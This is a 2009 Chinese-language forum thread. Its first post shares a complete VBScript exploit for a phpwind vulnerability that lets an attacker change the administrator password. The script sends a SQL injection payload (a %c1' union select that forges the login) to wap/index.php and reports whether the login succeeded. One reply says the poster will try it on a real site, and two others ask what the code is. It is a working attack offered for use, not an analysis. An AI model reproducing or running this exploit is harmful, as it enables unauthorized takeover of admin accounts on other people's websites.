返回列表 发帖
虚竹

Rank: 5Rank: 5

帖子
300 
积分
762 
威望
1212  
金钱
1030  
在线时间
3 小时 

贡献奖灌水王帅哥勋章
1 跳转到 » 倒序看帖
打印
tT
发表于 2009-1-31 17:46 | 只看该作者

phpwind任意修改管理员密码漏洞 VBS版利用程序

漏洞, 密码, phpwind, VBS, 管理员
phpwind任意修改管理员密码漏洞 VBS版利用程序
复制内容到剪贴板
代码:

'phpwind任意修改管理员密码漏洞 VBS版利用程序 By Tr4c3
Dim strUrl, strPost, xPost, strGet
Set Args = Wscript.Arguments
If Args.count<>2 Then
Wscript.Echo "Usage: " & Wscript.ScriptName & " http://hi.baidu.com/tr4c3/ 1"
Wscript.Quit
Else
strUrl = Args(0) & "wap/index.php"

strPost = "db_wapifopen=1&prog=login&pwuser=shit%c1'union select "& Args(1) &",mid(md5(666666),9,16),3,1,5/*&pwpwd=666666"
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST", strUrl, False
xPost.SetRequestHeader "Referer", strUrl
xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
xPost.send(strPost)
strGet = xPost.ResponseText
If InStr(strGet,"登录成功")<>0 Then
Wscript.Echo("执行成功")
Else
Wscript.Echo("执行失败")
End If
End If
就算错,我也错到底!我的空间,我的世界

收藏 分享

valen2000

Rank: 1

帖子
25 
积分
39 
威望
53  
金钱
51  
在线时间
0 小时 
2
发表于 2009-1-31 17:46 | 只看该作者
学习了~~~~~~~~
回头出去找个美萍的试试

TOP

山^鹰

Rank: 1

帖子
37 
积分
50 
威望
59  
金钱
57  
在线时间
1 小时 
3
发表于 2009-1-31 17:47 | 只看该作者
这个是批处理吗?还是编程代码?

TOP

cyt

Rank: 1

帖子
积分
11 
威望
9  
金钱
9  
在线时间
1 小时 
4
发表于 2009-2-9 08:50 | 只看该作者
請問這個是什麼東東?

白癡一個
看不懂

TOP

返回列表